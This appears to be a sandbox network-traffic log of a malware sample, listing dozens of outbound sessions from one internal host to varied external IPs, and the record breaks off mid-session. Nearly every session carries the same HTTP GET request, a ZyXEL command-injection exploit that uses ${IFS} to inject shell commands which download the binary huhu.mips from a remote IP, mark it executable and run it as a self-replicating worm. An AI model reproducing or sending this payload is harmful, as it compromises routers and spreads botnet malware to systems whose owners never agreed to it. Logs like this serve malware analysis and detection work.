                                            Feb 2, 2024 06:20:58.359853029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            726192.168.2.155918464.248.251.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359904051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            727192.168.2.1549808203.246.136.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359929085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            728192.168.2.155773646.37.36.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359960079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            729192.168.2.155451060.1.23.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359997034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            730192.168.2.15461465.29.224.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360044956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            731192.168.2.1537136219.149.26.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360097885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            732192.168.2.1556796133.63.155.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360141993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            733192.168.2.153469866.13.149.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360169888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            734192.168.2.1539076212.150.193.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360202074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            735192.168.2.1551100148.171.156.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360228062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            736192.168.2.1546478115.229.112.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360312939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            737192.168.2.1542622191.6.226.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360337019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            738192.168.2.1559576221.79.7.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360372066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            739192.168.2.154010614.13.80.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360419035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            740192.168.2.1540190168.90.183.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360456944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            741192.168.2.155090290.53.188.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360493898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            742192.168.2.1545086172.62.254.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360538960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            743192.168.2.155006040.58.231.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360577106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            744192.168.2.1551212106.187.255.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360613108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            745192.168.2.1542508196.69.20.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360646009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            746192.168.2.1557216208.157.103.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360688925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            747192.168.2.154164448.71.107.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360728979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            748192.168.2.154531845.124.123.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360758066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            749192.168.2.154650027.202.47.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360790968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            750192.168.2.154374212.126.207.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360825062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            751192.168.2.154858289.135.247.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360871077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            752192.168.2.155118694.13.219.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360918999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            753192.168.2.1548336181.16.9.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360951900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            754192.168.2.1537348178.98.154.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.360991955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            755192.168.2.155072613.68.95.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361015081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            756192.168.2.155175825.30.248.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361068010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            757192.168.2.1533708111.3.147.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361105919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            758192.168.2.1558206159.53.41.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361150026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            759192.168.2.1553566180.14.121.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361186028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            760192.168.2.1533718210.159.27.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361200094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            761192.168.2.1538146104.220.230.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361232042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            762192.168.2.1539060158.6.86.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361262083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            763192.168.2.1554782142.128.141.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361309052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            764192.168.2.153703654.226.209.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361352921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            765192.168.2.1560234181.44.74.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361378908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            766192.168.2.154035260.187.158.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361422062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            767192.168.2.154971064.91.255.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361443043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            768192.168.2.154532861.65.19.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361489058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            769192.168.2.1549218181.132.136.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361522913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            770192.168.2.15496009.33.180.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361560106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            771192.168.2.153382449.55.234.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361603975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            772192.168.2.153777493.34.240.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361634970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            773192.168.2.155861880.253.179.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361685038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            774192.168.2.1545992118.180.198.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361747026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            775192.168.2.1541596112.9.6.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361779928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            776192.168.2.1553532162.217.136.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361809969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            777192.168.2.1556392145.223.118.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361860991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            778192.168.2.1537284146.67.254.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361898899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            779192.168.2.1541678117.225.133.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361921072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            780192.168.2.153897452.121.20.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.361958981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            781192.168.2.15409761.28.181.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362009048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            782192.168.2.1536586211.135.135.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362050056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            783192.168.2.1533090168.64.207.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362102032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            784192.168.2.1537322139.252.108.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362138033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            785192.168.2.153685461.21.155.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362178087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            786192.168.2.1542318200.247.5.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362212896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            787192.168.2.153364040.161.66.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362262011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            788192.168.2.1543362178.126.188.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362291098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            789192.168.2.1559206133.105.228.98443
                                            TimestampBytes transferredDirectionData
